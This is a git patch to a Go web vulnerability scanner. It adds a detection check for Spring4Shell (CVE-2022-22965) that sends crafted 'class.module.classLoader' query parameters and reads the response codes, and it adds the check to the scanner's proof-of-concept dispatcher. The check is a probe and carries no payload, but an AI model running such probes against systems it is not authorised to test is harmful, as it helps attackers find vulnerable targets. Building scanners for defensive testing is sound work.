From ce9400835422b8d53a4af5e19c244c977c095a78 Mon Sep 17 00:00:00 2001 From: xx Date: Fri, 8 Apr 2022 11:38:19 +0800 Subject: [PATCH] Spring4Shell --- brute/filefuzz.go | 4 +++- pocs_go/Springboot/CVE-2022-22965.go | 18 ++++++++++++++++++ pocs_go/go_poc_check.go | 4 ++++ 3 files changed, 25 insertions(+), 1 deletion(-) create mode 100644 pocs_go/Springboot/CVE-2022-22965.go diff --git a/brute/filefuzz.go b/brute/filefuzz.go index c6872d87..e6673696 100644 --- a/brute/filefuzz.go +++ b/brute/filefuzz.go @@ -36,7 +36,9 @@ func reqPage(u string) (*page, *pkg.Response, error) { method = "HEAD" } } - if req, err := pkg.HttpRequset(u, method, "", false, nil); err == nil { + header := make(map[string]string) + header["Accept"] = "text/html,*/*;" + if req, err := pkg.HttpRequset(u, method, "", false, header); err == nil { if pkg.IntInSlice(req.StatusCode, []int{301, 302, 307, 308}) { page.is302 = true } diff --git a/pocs_go/Springboot/CVE-2022-22965.go b/pocs_go/Springboot/CVE-2022-22965.go new file mode 100644 index 00000000..1fbfadcb --- /dev/null +++ b/pocs_go/Springboot/CVE-2022-22965.go @@ -0,0 +1,18 @@ +package Springboot + +import ( + "github.com/veo/vscan/pkg" +) + +func CVE_2022_22965(u string) bool { + if req, err := pkg.HttpRequset(u+"?class.module.classLoader%5b1%5d=1", "GET", "", false, nil); err == nil { + if req.StatusCode == 500 { + if req2, err := pkg.HttpRequset(u+"?class.module.classLoader=1", "GET", "", false, nil); err == nil { + if req2.StatusCode == 200 { + return true + } + } + } + } + return false +} diff --git a/pocs_go/go_poc_check.go b/pocs_go/go_poc_check.go index 01f79595..7f930292 100644 --- a/pocs_go/go_poc_check.go +++ b/pocs_go/go_poc_check.go @@ -172,6 +172,10 @@ func POCcheck(wappalyzertechnologies []string, URL string, finalURL string) []st if zabbix.CVE_2022_23131(URL) { technologies = append(technologies, "exp-ZabbixSAML|bypass-login") } + case "Spring": + if Springboot.CVE_2022_22965(finalURL) { + technologies = append(technologies, "exp-Spring4Shell|CVE_2022_22965") + } case "SpringGateway": if Springboot.CVE_2022_22947(URL) { technologies = append(technologies, "exp-SpringGateway|CVE_2022_22947")